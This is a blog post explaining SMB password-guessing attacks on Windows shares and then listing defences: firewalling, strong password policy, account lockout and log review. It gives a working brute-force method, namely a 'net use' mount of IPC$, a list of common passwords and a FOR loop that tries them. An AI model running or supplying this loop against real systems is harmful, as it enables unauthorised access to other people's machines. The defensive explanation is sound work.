Security Information and Review

Collection of security information and review

Microsoft Windows Authentication Spoofing Attack

Author : Admin

The common way to attack Microsoft Windows Sytem is pass through the Windows File and Print Sharing Service, which operates over protocol called SMB ( Server Message Block ). SMB protocol listening on TCP port 445 and 139 ( also known as NetBIOS based service ). An attacker commonly attacked via password guessing on Microsoft Remote Procedure Call ( MSRPC ) listening on TCP port 135, Terminal Services on TCP port 3389 and other services.

 

In this discussion, we will describe how to attack MS Windows System via password guessing and assuming that SMB is accessible. The most effective method for breaking into a Windows System is remote share mounting such as IPC$ or C$. Combination username and password is used to connect to an enumerated share. We will use the net use command like this.

1
C:>net use \\computer_name\IPC$ * /u:Administrator

Password Guessing technique that simple and easy is script vi the command line. In this script, we will a simple loop using the Windows Command Shell for and combination with the net use syntax. First step, we will create a simple username and password file based on common username and password combinations. See sample text with any delimiter can be user to separate the values, such tabs and save c:\listpassword.txt, like this :

1
2
3
4
5
6
7
8
password 		username
 
password	Administrator
admin		Administrator
administrator	Administrator
secret		Administrator
4dm1n		Administrator
…

Second step, run the command line to automate password guessing, see script like this :

1
C:>FOR /F “tokens-1, 2*” %i in (listpassword.txt) do net use \\computer_name\IPC$ %i /u:%j

Next, how to prevent password guessing and we need the best solution. Solution we will use, with the assumption of SMB protocol remains active.

 

First, we use a MS Windows firewall built in to restrict access to potentially vulnerable service, such SMB, MSRPC and Terminal Service. Disabling unnecessary services and block with Windows Firewall.

 

Second, Enforce the use of strong passwords using policy. Microsoft has historically provide a number of ways to automatically require users to use strong passwords, the account policy.

 

Three, set an account lockout threshold and ensure that it applies to the built in Administrator account. One of the most important to take to mitigate SMB password guessing attacks is to set an account lockout threshold.

 

Fourth, log account logon failures and regularly review event logs. It’s wise to log failed logon attempts using audit policy and enabling auditing is not enough. We must regularly view the logs for evidence of intruders.

 

We hope this discussion can provide benefits and increase the quality of our knowledge.

 

 

Mohamad Widodo

Mohamad Widodo

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Netvouz
  • DZone
  • ThisNext
  • MisterWong
  • Wists
  • Technorati
  • YahooMyWeb
  • Slashdot
  • StumbleUpon
Categories: Windows Security
If you like this posts, please leave messages / comments.